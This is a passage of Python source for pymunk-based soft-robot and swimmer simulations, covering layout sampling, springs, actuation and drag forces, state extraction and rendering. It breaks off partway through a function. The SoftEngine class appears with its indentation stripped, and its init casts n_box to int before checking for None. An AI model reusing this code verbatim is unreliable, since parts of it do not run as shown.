                        r_actuated, r_soft, r_rigid = 0.25, 0.25, 0.5
                    elif j == 0:
                        r_actuated, r_soft, r_rigid = 0.0, 0.5, 0.5
                    elif j == c - 1:
                        r_actuated, r_soft, r_rigid = 0.75, 0.25, 0.0
                    else:
                        r_actuated, r_soft, r_rigid = 0.4, 0.2, 0.4
                    if r < r_actuated:
                        material = 0
                    elif r < r_actuated + r_soft:
                        material = 1
                    else:
                        material = 2
                init_p[idx, :] = np.array([i, y[i] + j, material])
                idx += 1
        if (init_p[:, 2] == 0).sum() >= 2:
            break
    # print('init_p', init_p)
    if aug:
        if np.random.rand() > 0.5:
            '''flip y'''
            init_p[:, 1] = -init_p[:, 1]
        if np.random.rand() > 0.5:
            '''flip x'''
            init_p[:, 0] = -init_p[:, 0]
        if np.random.rand() > 0.5:
            '''swap x and y'''
            x, y = init_p[:, 0], init_p[:, 1]
            init_p[:, 0], init_p[:, 1] = y.copy(), x.copy()
    # print('init_p', init_p)
    return init_p
def sample_init_p_regular(n_box, shape_type=None, aug=False):
    """Sample a regular named box layout (u/0, 1, I or T shape).

    Returns an (n_box, 3) array of rows [x, y, material]; material is
    0 = actuated, 1 = soft, 2 = rigid.  shape_type 4 ("stronger T") is a
    hard-coded 10-box layout and is only reachable when passed explicitly.

    :param n_box: number of boxes.
    :param shape_type: 0..4 layout selector; sampled from 0..3 when None.
    :param aug: if True, randomly flip y and/or transpose the layout.
    """
    print('sample_init_p')
    init_p = np.zeros((n_box, 3))
    if shape_type is None: shape_type = rand_int(0, 4)
    print('shape_type', shape_type)
    if shape_type == 0:  # 0 or u shape
        # Three rigid base boxes, then grow the two (or three) side columns.
        init_p[0, :] = np.array([0, 0, 2])
        init_p[1, :] = np.array([-1, 0, 2])
        init_p[2, :] = np.array([1, 0, 2])
        idx = 3
        y = 0
        x = [-1, 0, 1]
        res = n_box - 3
        while res > 0:
            y += 1
            if res == 3:
                # Exactly three remaining: close the top with a full row.
                i_list = [0, 1, 2]
            else:
                i_list = [0, 2]
            material = [0, 1][int(np.random.rand() < 0.5 and res > 3)]
            for i in i_list:
                init_p[idx, :] = np.array([x[i], y, material])
                idx += 1
                res -= 1
    elif shape_type == 1:  # 1 shape
        # Single vertical column on a rigid base box.
        init_p[0, :] = np.array([0, 0, 2])
        for i in range(1, n_box):
            material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
            init_p[i, :] = np.array([0, i, material])
    elif shape_type == 2:  # I shape
        if n_box < 7:
            # Narrow base, column, actuated top bar of three boxes.
            init_p[0, :] = np.array([0, 0, 2])
            for i in range(1, n_box - 3):
                material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
                init_p[i, :] = np.array([0, i, material])
            init_p[n_box - 1, :] = np.array([-1, n_box - 3, 0])
            init_p[n_box - 2, :] = np.array([0, n_box - 3, 0])
            init_p[n_box - 3, :] = np.array([1, n_box - 3, 0])
        else:
            # Wide rigid base of three boxes plus the actuated top bar.
            init_p[0, :] = np.array([-1, 0, 2])
            init_p[1, :] = np.array([0, 0, 2])
            init_p[2, :] = np.array([1, 0, 2])
            for i in range(3, n_box - 3):
                material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
                init_p[i, :] = np.array([0, i - 2, material])
            init_p[n_box - 1, :] = np.array([-1, n_box - 5, 0])
            init_p[n_box - 2, :] = np.array([0, n_box - 5, 0])
            init_p[n_box - 3, :] = np.array([1, n_box - 5, 0])
    elif shape_type == 3:  # T shape
        if n_box < 6:
            # Three-box rigid base with a single column.
            init_p[0, :] = np.array([-1, 0, 2])
            init_p[1, :] = np.array([0, 0, 2])
            init_p[2, :] = np.array([1, 0, 2])
            for i in range(3, n_box):
                material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
                init_p[i, :] = np.array([0, i - 2, material])
        else:
            # Five-box rigid base with a single column.
            init_p[0, :] = np.array([-2, 0, 2])
            init_p[1, :] = np.array([-1, 0, 2])
            init_p[2, :] = np.array([0, 0, 2])
            init_p[3, :] = np.array([1, 0, 2])
            init_p[4, :] = np.array([2, 0, 2])
            for i in range(5, n_box):
                material = [0, 1][int(np.random.rand() < 0.5 and i < n_box - 1)]
                init_p[i, :] = np.array([0, i - 4, material])
    elif shape_type == 4:  # stronger T
        # Fully hard-coded 10-box layout.
        assert n_box == 10
        init_p[0, :] = np.array([0, -4, 0])
        init_p[1, :] = np.array([1, -4, 1])
        init_p[2, :] = np.array([0, -3, 0])
        init_p[3, :] = np.array([1, -3, 0])
        init_p[4, :] = np.array([0, -2, 1])
        init_p[5, :] = np.array([1, -2, 0])
        init_p[6, :] = np.array([-1, -1, 2])
        init_p[7, :] = np.array([0, -1, 2])
        init_p[8, :] = np.array([1, -1, 2])
        init_p[9, :] = np.array([2, -1, 2])
    if aug:
        if np.random.rand() > 0.5:
            '''flip y'''
            init_p[:, 1] = -init_p[:, 1]
        if np.random.rand() > 0.5:
            '''swap x and y'''
            x, y = init_p[:, 0], init_p[:, 1]
            init_p[:, 0], init_p[:, 1] = y.copy(), x.copy()
    return init_p
class SoftEngine(Engine):
def __init__(self, dt, state_dim, action_dim, param_dim,
num_box_range=[5, 10], k_range=[600, 1000.]):
# state_dim = 4
# action_dim = 1
# param_dim = 4 - [n_box, k, damping, init_p]
# init_p: n_box * 3 - [x, y, type]
# type: 0 - soft & actuated, 1 - soft, 2 - rigid
self.side_length = 1.
self.num_box_range = num_box_range
self.k_range = k_range
self.radius = 0.01
self.mass = 1.
super(SoftEngine, self).__init__(dt, state_dim, action_dim, param_dim)
@property
def num_obj(self):
return self.n_box
def inside_lim(self, x, y, lim):
if x >= lim[0] and x < lim[1] and y >= lim[0] and y < lim[1]:
return True
return False
def sample_init_p(self):
n_box = self.n_box
r_actuated = 0.5
r_soft = 0.25
r_rigid = 0.25
lim = -4, 4
mask = np.zeros((lim[1] - lim[0], lim[1] - lim[0]))
init_p = np.zeros((n_box, 3))
buf = []
# add a fixed box
x, y = 0, -4
init_p[0] = np.array([x, y, 3])
buf.append([x - 1, y])
buf.append([x, y + 1])
buf.append([x + 1, y])
mask[x, y] = mask[x - 1, y] = mask[x, y + 1] = mask[x + 1, y] = 1
for i in range(1, n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
if len(buf) > 0:
idx = rand_int(0, len(buf))
x = buf[idx][0]
y = buf[idx][1]
del buf[idx]
else:
x = rand_int(lim[0], lim[1])
y = rand_int(lim[0], lim[1])
init_p[i, 0], init_p[i, 1] = x, y
mask[x, y] = 1
if self.inside_lim(x + 1, y, lim) and mask[x + 1, y] == 0:
buf.append([x + 1, y]);
mask[x + 1, y] = 1
if self.inside_lim(x - 1, y, lim) and mask[x - 1, y] == 0:
buf.append([x - 1, y]);
mask[x - 1, y] = 1
if self.inside_lim(x, y + 1, lim) and mask[x, y + 1] == 0:
buf.append([x, y + 1]);
mask[x, y + 1] = 1
if self.inside_lim(x, y - 1, lim) and mask[x, y - 1] == 0:
buf.append([x, y - 1]);
mask[x, y - 1] = 1
while (init_p[:, 2] == 0).sum() < 2:
''' less than 2 actuated'''
''' re-generate box type'''
for i in range(1, n_box):
roll_type = np.random.rand()
if roll_type < r_actuated:
init_p[i, 2] = 0
elif roll_type < r_actuated + r_soft:
init_p[i, 2] = 1
else:
init_p[i, 2] = 2
return init_p
def init(self, param=None):
if param is None:
self.n_box, self.k, self.damping, self.init_p = [None] * 4
else:
self.n_box, self.k, self.damping, self.init_p = param
self.n_box = int(self.n_box)
if self.n_box is None:
self.n_box = rand_int(self.num_box_range[0], self.num_box_range[1])
if self.k is None:
self.k = rand_float(self.k_range[0], self.k_range[1])
if self.damping is None:
self.damping = self.k / 20.
if self.init_p is None:
self.init_p = self.sample_init_p()
# self.init_p = sample_init_p_regular(self.n_box, shape_type=4)
# print('Env Soft param: n_box=%d, k=%.4f, damping=%.4f' % (self.n_box, self.k, self.damping))
self.space = pymunk.Space()
self.space.gravity = (0., 0.)
self.add_masses()
self.add_rels()
self.state_prv = None
def add_masses(self):
inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
self.balls = []
for i in range(self.n_box):
x, y, t = self.init_p[i]
l = self.side_length / 2.
for j in range(4):
body = pymunk.Body(self.mass, inertia)
if j == 0:
body.position = Vec2d(x - l, y - l)
elif j == 1:
body.position = Vec2d(x - l, y + l)
elif j == 2:
body.position = Vec2d(x + l, y - l)
else:
body.position = Vec2d(x + l, y + l)
# shape = pymunk.Circle(body, self.radius, (0, 0))
# self.space.add(body, shape)
self.space.add(body)
self.balls.append(body)
def add_rels(self):
ball = self.balls[0]
c = pymunk.PinJoint(self.space.static_body, ball, (ball.position[0], ball.position[1]), (0, 0))
self.space.add(c)
ball = self.balls[2]
c = pymunk.PinJoint(self.space.static_body, ball, (ball.position[0], ball.position[1]), (0, 0))
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[0], self.balls[1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[1], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[2], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[1], self.balls[2], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[0], self.balls[3], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
for i in range(1, self.n_box):
if self.init_p[i, 2] <= 1:
# if the box is soft
# side
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length, stiffness=self.k, damping=self.damping)
self.space.add(c)
# cross
c = pymunk.DampedSpring(
self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
c = pymunk.DampedSpring(
self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0),
rest_length=self.side_length * np.sqrt(2), stiffness=self.k, damping=self.damping)
self.space.add(c)
else:
# if the box is rigid
# side
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 1], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 3], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# cross
c = pymunk.PinJoint(self.balls[i * 4], self.balls[i * 4 + 3], (0, 0), (0, 0))
self.space.add(c)
c = pymunk.PinJoint(self.balls[i * 4 + 1], self.balls[i * 4 + 2], (0, 0), (0, 0))
self.space.add(c)
# add PinJoint to adjacent boxes
for i in range(self.n_box):
for j in range(i):
for ii in range(4):
for jj in range(4):
x, y = i * 4 + ii, j * 4 + jj
if calc_dis(self.balls[x].position, self.balls[y].position) < 1e-4:
c = pymunk.PinJoint(self.balls[x], self.balls[y], (0, 0), (0, 0))
self.space.add(c)
def add_force(self):
for i in range(self.n_box):
if self.init_p[i, 2] == 0:
# if the current box has actuator
for j in range(4):
x, y = i * 4 + j, i * 4 + (3 - j)
direct = np.array([
self.balls[y].position[0] - self.balls[x].position[0],
self.balls[y].position[1] - self.balls[x].position[1]])
direct /= norm(direct)
force = direct * self.action[i]
self.balls[x].apply_force_at_local_point(
force=(force[0], force[1]), point=(0, 0))
def get_param(self):
return self.n_box, self.k, self.damping, self.init_p
    def get_state(self):
        """Return the observed state, shape (n_box, 16).

        Per-box layout: columns 0-7 are (x, y) positions of the four corner
        masses, columns 8-15 their velocities. Corner entries shared with
        adjacent boxes (same grid side/corner in init_p) are averaged over
        all touching boxes, and the velocity half is then replaced by a
        finite difference against the previous averaged state (zeros on the
        first call, when self.state_prv is None).
        """
        state = np.zeros((self.n_box, 16))
        for i in range(self.n_box):
            for j in range(4):
                ball = self.balls[i * 4 + j]
                state[i, j * 2: (j + 1) * 2] = \
                    np.array([ball.position[0], ball.position[1]])
                state[i, 8 + j * 2: 8 + (j + 1) * 2] = \
                    np.array([ball.velocity[0], ball.velocity[1]])
        # state_acc accumulates per-corner sums; count tracks how many boxes
        # contributed to each corner slot so the sum can be averaged.
        state_acc = state.copy()
        count = np.zeros((self.n_box, 1, 8))
        for i in range(self.n_box):
            for j in range(self.n_box):
                if i == j:
                    count[i, :, :] += 1
                    continue
                # grid offset between box i and box j (from init placement)
                delta = self.init_p[i, :2] - self.init_p[j, :2]
                assert (np.abs(delta) > 0).any()
                if (np.abs(delta) > 1).any():
                    # no contact
                    continue
                if np.sum(np.abs(delta)) == 1:
                    # contact at a side: two corner pairs coincide.
                    # (x0, x1) are box i's corner indices, (y0, y1) the
                    # matching corners of box j.
                    if delta[0] == 1:
                        x0, y0, x1, y1 = 1, 3, 0, 2
                    elif delta[0] == -1:
                        x0, y0, x1, y1 = 3, 1, 2, 0
                    elif delta[1] == 1:
                        x0, y0, x1, y1 = 0, 1, 2, 3
                    elif delta[1] == -1:
                        x0, y0, x1, y1 = 1, 0, 3, 2
                    # corner index -> column offset (2 columns per corner)
                    x0 *= 2
                    y0 *= 2
                    x1 *= 2
                    y1 *= 2
                    count[i, :, x0:x0 + 2] += 1
                    count[i, :, x1:x1 + 2] += 1
                    state_acc[i, x0:x0 + 2] += state[j, y0:y0 + 2]
                    state_acc[i, x0 + 8:x0 + 10] += state[j, y0 + 8:y0 + 10]
                    state_acc[i, x1:x1 + 2] += state[j, y1:y1 + 2]
                    state_acc[i, x1 + 8:x1 + 10] += state[j, y1 + 8:y1 + 10]
                elif np.sum(np.abs(delta)) == 2:
                    # contact at a corner: one corner pair coincides
                    if delta[0] == 1 and delta[1] == 1:
                        x, y = 0, 3
                    elif delta[0] == 1 and delta[1] == -1:
                        x, y = 1, 2
                    elif delta[0] == -1 and delta[1] == 1:
                        x, y = 2, 1
                    elif delta[0] == -1 and delta[1] == -1:
                        x, y = 3, 0
                    x *= 2
                    y *= 2
                    count[i, :, x:x + 2] += 1
                    state_acc[i, x:x + 2] += state[j, y:y + 2]
                    state_acc[i, x + 8:x + 10] += state[j, y + 8:y + 10]
        # average: the (n_box, 2, 8) view broadcasts count over the
        # position half and the velocity half simultaneously
        state_acc = state_acc.reshape(self.n_box, 2, 8) / count
        state_acc = state_acc.reshape(self.n_box, 16)
        # replace velocities with a finite difference of averaged positions
        vel_dim = self.state_dim // 2
        if self.state_prv is None:
            state_acc[:, vel_dim:] = 0
        else:
            state_acc[:, vel_dim:] = (state_acc[:, :vel_dim] - self.state_prv[:, :vel_dim]) / self.dt
        return state_acc
    def step(self):
        """Advance the simulation by one dt: apply actuation forces, cache
        the current observed state as state_prv, then integrate the space."""
        self.add_force()
        self.state_prv = self.get_state()
        self.space.step(self.dt)
def render(self, states, actions=None, param=None, act_scale=10.,
video=True, image=False, path=None, lim=(-5., 5., -6., 4.),
states_gt=None, count_down=False, gt_border=False):
if video:
video_path = path + '.avi'
fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')
print('Save video as %s' % video_path)
out = cv2.VideoWriter(video_path, fourcc, 25, (640, 480))
if image:
image_path = path + '_img'
print('Save images to %s' % image_path)
os.system('mkdir -p %s' % image_path)
c = ['royalblue', 'tomato', 'limegreen', 'orange', 'violet', 'chocolate', 'lightsteelblue']
time_step = states.shape[0]
n_ball = states.shape[1] * 4
states = states[:, :, :8].reshape((time_step, n_ball, 2))
if states_gt is not None:
states_gt = states_gt[:, :, :8].reshape((time_step, n_ball, 2))
init_p = param[3]
for i in range(time_step):
fig, ax = plt.subplots(1)
plt.xlim(lim[0], lim[1])
plt.ylim(lim[2], lim[3])
plt.axis('off')
polys = []
polys_color = []
circles = []
circles_color = []
for j in [0, 2]:
circle = Circle((states[i, j, 0], states[i, j, 1]), radius=0.1)
circles.append(circle)
circles_color.append('orangered')
for j in range(self.n_box):
poly = Polygon(np.array([
states[i, j * 4, :2], states[i, j * 4 + 1, :2],
states[i, j * 4 + 3, :2], states[i, j * 4 + 2, :2]]), True)
polys.append(poly)
if init_p[j, 2] == 0:
if actions is not None:
act = actions[i, j]
else:
act = 0.
r = (act + act_scale) / (act_scale * 2)
if np.abs(r - 0.5) < 1e-4:
c = 'cornflowerblue'
else:
c = to_rgba('tomato')[:3] * r + to_rgba('limegreen')[:3] * (1. - r)
c = np.clip(c, 0., 1.)
polys_color.append(c)
elif init_p[j, 2] == 1:
polys_color.append('lightsteelblue')
elif init_p[j, 2] == 2:
polys_color.append('dimgray')
elif init_p[j, 2] == 3:
polys_color.append('lightsteelblue')
else:
raise AssertionError("Unknown box type %f" % init_p[j, 2])
if states_gt is not None:
polys_gt = []
for j in range(self.n_box):
poly = Polygon(np.array([
states_gt[i, j * 4, :2], states_gt[i, j * 4 + 1, :2],
states_gt[i, j * 4 + 3, :2], states_gt[i, j * 4 + 2, :2]]), True)
polys_gt.append(poly)
if gt_border:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=(0., 0., 0., 0.), edgecolor='orangered', lw=1.)
else:
pc_polys_gt = PatchCollection(
polys_gt, facecolor=polys_color, linewidth=0, alpha=0.5)
circles_gt = []
for j in [0, 2]:
circle = Circle((states[i, j, 0], states[i, j, 1]), radius=0.1)
circles_gt.append(circle)
pc_circles_gt = PatchCollection(circles_gt, facecolor=circles_color, linewidth=0, alpha=0.5)
pc_polys = PatchCollection(polys, facecolor=polys_color, linewidth=0, alpha=1.)
pc_circles = PatchCollection(circles, facecolor=circles_color, linewidth=0, alpha=1.)
ax.add_collection(pc_polys)
ax.add_collection(pc_circles)
if states_gt is not None:
ax.add_collection(pc_polys_gt)
ax.add_collection(pc_circles_gt)
ax.set_aspect('equal')
font = {'family': 'serif',
'color': 'darkred',
'weight': 'normal',
'size': 16}
if count_down:
plt.text(-5, 3, 'CountDown: %d' % (time_step - i - 1), fontdict=font)
plt.tight_layout()
if video:
fig.canvas.draw()
frame = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
frame = frame.reshape(fig.canvas.get_width_height()[::-1] + (3,))
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
out.write(frame)
if i == time_step - 1:
for _ in range(10):
out.write(frame)
if image:
plt.savefig(os.path.join(image_path, 'fig_%s.png' % i), bbox_inches='tight')
plt.close()
if video:
out.release()
class SwimEngine(Engine):
    """2-D swimmer simulated in a zero-gravity pymunk space.

    Each box is four point masses at its corners. Soft boxes (type 0 or 1)
    connect the corners with damped springs, rigid boxes (type 2) with pin
    joints. Actuated boxes (type 0) contract/expand along their diagonals,
    and their outward-facing edges receive a quadratic drag force, which is
    what propels the structure.
    """

    def __init__(self, dt, state_dim, action_dim, param_dim,
                 num_box_range=[5, 10], k_range=[600, 800.]):
        # state_dim = 4
        # action_dim = 1
        # param_dim = 4 - [n_box, k, damping, init_p]
        # init_p: n_box * 3 - [x, y, type]
        # type: 0 - soft & actuated, 1 - soft, 2 - rigid
        self.side_length = 1.
        self.num_box_range = num_box_range
        self.k_range = k_range
        self.radius = 0.01
        self.mass = 1.
        super(SwimEngine, self).__init__(dt, state_dim, action_dim, param_dim)

    @property
    def num_obj(self):
        """Number of objects (boxes) in the scene."""
        return self.n_box

    def inside_lim(self, x, y, lim):
        """Return True if grid cell (x, y) lies inside [lim[0], lim[1]) in both axes."""
        if x >= lim[0] and x < lim[1] and y >= lim[0] and y < lim[1]:
            return True
        return False

    def sample_init_p(self):
        """Randomly grow a connected layout of n_box unit boxes on a grid.

        Returns an (n_box, 3) array of [grid_x, grid_y, type] rows. Boxes
        are placed by expanding from a random seed cell through a frontier
        list so the structure stays connected; box types are re-rolled
        until at least two boxes are actuated (type 0).
        """
        n_box = self.n_box
        # type probabilities: 0.5 actuated, 0.25 soft, remaining 0.25 rigid
        r_actuated = 0.5
        r_soft = 0.25
        lim = -4, 4
        mask = np.zeros((lim[1] - lim[0], lim[1] - lim[0]))
        init_p = np.zeros((n_box, 3))
        buf = []
        for i in range(n_box):
            roll_type = np.random.rand()
            if roll_type < r_actuated:
                init_p[i, 2] = 0
            elif roll_type < r_actuated + r_soft:
                init_p[i, 2] = 1
            else:
                init_p[i, 2] = 2
            if len(buf) > 0:
                # take a random cell from the frontier
                idx = rand_int(0, len(buf))
                x = buf[idx][0]
                y = buf[idx][1]
                del buf[idx]
            else:
                # seed cell for the first box
                x = rand_int(lim[0] // 2, lim[1] // 2)
                y = rand_int(lim[0] // 2, lim[1] // 2)
            init_p[i, 0], init_p[i, 1] = x, y
            # NOTE(review): x, y may be negative; mask[x, y] relies on
            # numpy's negative-index wrap-around, which is consistent as
            # long as all cells stay within [lim[0], lim[1])
            mask[x, y] = 1
            # push unvisited 4-neighbours onto the frontier
            if self.inside_lim(x + 1, y, lim) and mask[x + 1, y] == 0:
                buf.append([x + 1, y])
                mask[x + 1, y] = 1
            if self.inside_lim(x - 1, y, lim) and mask[x - 1, y] == 0:
                buf.append([x - 1, y])
                mask[x - 1, y] = 1
            if self.inside_lim(x, y + 1, lim) and mask[x, y + 1] == 0:
                buf.append([x, y + 1])
                mask[x, y + 1] = 1
            if self.inside_lim(x, y - 1, lim) and mask[x, y - 1] == 0:
                buf.append([x, y - 1])
                mask[x, y - 1] = 1
        while (init_p[:, 2] == 0).sum() < 2:
            # fewer than 2 actuated boxes: re-roll every box type
            for i in range(n_box):
                roll_type = np.random.rand()
                if roll_type < r_actuated:
                    init_p[i, 2] = 0
                elif roll_type < r_actuated + r_soft:
                    init_p[i, 2] = 1
                else:
                    init_p[i, 2] = 2
        return init_p

    def calc_outside(self):
        """Record which of each box's four edges face the outside.

        self.outside[i, e] is 1 when edge e of box i has no adjacent box,
        0 otherwise. Edge order (from the corner layout in add_masses):
        0 = left, 1 = top, 2 = right, 3 = bottom. Used by add_force to
        decide where to apply water drag.
        """
        self.outside = np.ones((self.n_box, 4))
        for i in range(self.n_box):
            for j in range(self.n_box):
                if i == j:
                    continue
                delta = self.init_p[i, :2] - self.init_p[j, :2]
                assert (np.abs(delta) > 0).any()
                if (np.abs(delta) > 1).any():
                    # no contact
                    continue
                if np.sum(np.abs(delta)) == 1:
                    # contact at a side: clear the edge facing box j
                    if delta[0] == 1:
                        self.outside[i, 0] = 0
                    elif delta[0] == -1:
                        self.outside[i, 2] = 0
                    elif delta[1] == 1:
                        self.outside[i, 3] = 0
                    elif delta[1] == -1:
                        self.outside[i, 1] = 0

    def init(self, param=None):
        """(Re)build the pymunk scene.

        param, when given, is [n_box, k, damping, init_p]; any None entry
        is sampled/derived: n_box uniform in num_box_range, k uniform in
        k_range, damping = k / 20, init_p via sample_init_p().
        """
        if param is None:
            self.n_box, self.k, self.damping, self.init_p = [None] * 4
        else:
            self.n_box, self.k, self.damping, self.init_p = param
        if self.n_box is None:
            self.n_box = rand_int(self.num_box_range[0], self.num_box_range[1])
        # bug fix: cast only after the None default has been filled in —
        # casting first raised TypeError when init() was called without a
        # param and made the None-check above unreachable
        self.n_box = int(self.n_box)
        if self.k is None:
            self.k = rand_float(self.k_range[0], self.k_range[1])
        if self.damping is None:
            self.damping = self.k / 20.
        if self.init_p is None:
            self.init_p = self.sample_init_p()
        self.space = pymunk.Space()
        self.space.gravity = (0., 0.)
        self.add_masses()
        self.add_rels()
        self.calc_outside()
        self.state_prv = None

    def add_masses(self):
        """Create the four corner point masses of every box.

        Corner order per box: 0 = (x-l, y-l), 1 = (x-l, y+l),
        2 = (x+l, y-l), 3 = (x+l, y+l), with l half the side length.
        """
        inertia = pymunk.moment_for_circle(self.mass, 0, self.radius, (0, 0))
        self.balls = []
        for i in range(self.n_box):
            x, y, _ = self.init_p[i]
            l = self.side_length / 2.
            for j in range(4):
                body = pymunk.Body(self.mass, inertia)
                if j == 0:
                    body.position = Vec2d(x - l, y - l)
                elif j == 1:
                    body.position = Vec2d(x - l, y + l)
                elif j == 2:
                    body.position = Vec2d(x + l, y - l)
                else:
                    body.position = Vec2d(x + l, y + l)
                self.space.add(body)
                self.balls.append(body)

    def add_rels(self):
        """Connect the corner masses of each box, then pin shared corners.

        Soft boxes (type <= 1) get damped springs along the four sides and
        both diagonals; rigid boxes get pin joints on the same pairs.
        Finally, coinciding corners of adjacent boxes are pinned together
        so the structure stays attached.
        """
        side_pairs = [(0, 1), (0, 2), (3, 1), (3, 2)]
        cross_pairs = [(0, 3), (1, 2)]
        for i in range(self.n_box):
            soft = self.init_p[i, 2] <= 1
            for (a, b) in side_pairs + cross_pairs:
                # diagonals have a sqrt(2)-times-longer rest length
                rest = self.side_length if (a, b) in side_pairs \
                    else self.side_length * np.sqrt(2)
                if soft:
                    c = pymunk.DampedSpring(
                        self.balls[i * 4 + a], self.balls[i * 4 + b], (0, 0), (0, 0),
                        rest_length=rest, stiffness=self.k, damping=self.damping)
                else:
                    c = pymunk.PinJoint(
                        self.balls[i * 4 + a], self.balls[i * 4 + b], (0, 0), (0, 0))
                self.space.add(c)
        # pin coinciding corners of adjacent boxes together
        for i in range(self.n_box):
            for j in range(i):
                for ii in range(4):
                    for jj in range(4):
                        x, y = i * 4 + ii, j * 4 + jj
                        if calc_dis(self.balls[x].position, self.balls[y].position) < 1e-4:
                            c = pymunk.PinJoint(self.balls[x], self.balls[y], (0, 0), (0, 0))
                            self.space.add(c)

    def add_force(self):
        """Apply actuation forces and a simple water-drag model.

        Actuation: each corner of an actuated box (type 0) is pushed along
        the unit vector towards its diagonally opposite corner, scaled by
        the box's action value (negative action contracts the box).

        Drag: for every outward-facing edge (see calc_outside) of an
        actuated box that is contracting (action < 0), a force quadratic in
        the edge endpoints' outward velocity and proportional to the edge
        length is applied against the motion.
        """
        for i in range(self.n_box):
            if self.init_p[i, 2] == 0:
                # if the current box has an actuator
                for j in range(4):
                    x, y = i * 4 + j, i * 4 + (3 - j)
                    direct = np.array([
                        self.balls[y].position[0] - self.balls[x].position[0],
                        self.balls[y].position[1] - self.balls[x].position[1]])
                    direct /= norm(direct)
                    force = direct * self.action[i]
                    self.balls[x].apply_force_at_local_point(
                        force=(force[0], force[1]), point=(0, 0))
        for i in range(self.n_box):
            # gather position/velocity of the four corners of box i
            s = np.zeros((4, 4))
            for j in range(4):
                idx = i * 4 + j
                s[j, 0] = self.balls[idx].position[0]
                s[j, 1] = self.balls[idx].position[1]
                s[j, 2] = self.balls[idx].velocity[0]
                s[j, 3] = self.balls[idx].velocity[1]
            for j in range(4):
                # corner pair (a, b) spanning edge j: 0=left, 1=top, 2=right, 3=bottom
                if j == 0:
                    a, b = 0, 1
                elif j == 1:
                    a, b = 1, 3
                elif j == 2:
                    a, b = 3, 2
                else:
                    a, b = 2, 0
                if self.outside[i, j] == 1 and self.init_p[i, 2] == 0 and self.action[i] < 0:
                    direct = s[b, :2] - s[a, :2]
                    dist = norm(direct)
                    direct /= dist
                    # rotate the edge direction 90 degrees to get the
                    # outward normal of the edge
                    direct = np.array([-direct[1], direct[0]])
                    v_scale = np.dot(s[a, 2:], direct)
                    if v_scale > 0.:
                        # quadratic drag opposing outward motion of corner a
                        f = - v_scale ** 2 * direct * dist * 50.
                        self.balls[i * 4 + a].apply_force_at_local_point(
                            force=(f[0], f[1]), point=(0, 0))
                    v_scale = np.dot(s[b, 2:], direct)
                    if v_scale > 0.:
                        f = - v_scale ** 2 * direct * dist * 50.
                        self.balls[i * 4 + b].apply_force_at_local_point(
                            force=(f[0], f[1]), point=(0, 0))

    def get_param(self):
        """Return the engine parameters as (n_box, k, damping, init_p)."""
        return self.n_box, self.k, self.damping, self.init_p

    def get_state(self):
        """Return the observed state, shape (n_box, 16).

        Per-box layout: columns 0-7 are (x, y) positions of the four corner
        masses, columns 8-15 their velocities. Corners shared with adjacent
        boxes are averaged over all touching boxes; the velocity half is
        then replaced by a finite difference against the previous averaged
        state (zeros on the first call).
        """
        state = np.zeros((self.n_box, 16))
        for i in range(self.n_box):
            for j in range(4):
                ball = self.balls[i * 4 + j]
                state[i, j * 2: (j + 1) * 2] = \
                    np.array([ball.position[0], ball.position[1]])
                state[i, 8 + j * 2: 8 + (j + 1) * 2] = \
                    np.array([ball.velocity[0], ball.velocity[1]])
        # state_acc accumulates per-corner sums; count tracks contributors
        state_acc = state.copy()
        count = np.zeros((self.n_box, 1, 8))
        for i in range(self.n_box):
            for j in range(self.n_box):
                if i == j:
                    count[i, :, :] += 1
                    continue
                delta = self.init_p[i, :2] - self.init_p[j, :2]
                assert (np.abs(delta) > 0).any()
                if (np.abs(delta) > 1).any():
                    # no contact
                    continue
                if np.sum(np.abs(delta)) == 1:
                    # contact at a side: two corner pairs coincide
                    if delta[0] == 1:
                        x0, y0, x1, y1 = 1, 3, 0, 2
                    elif delta[0] == -1:
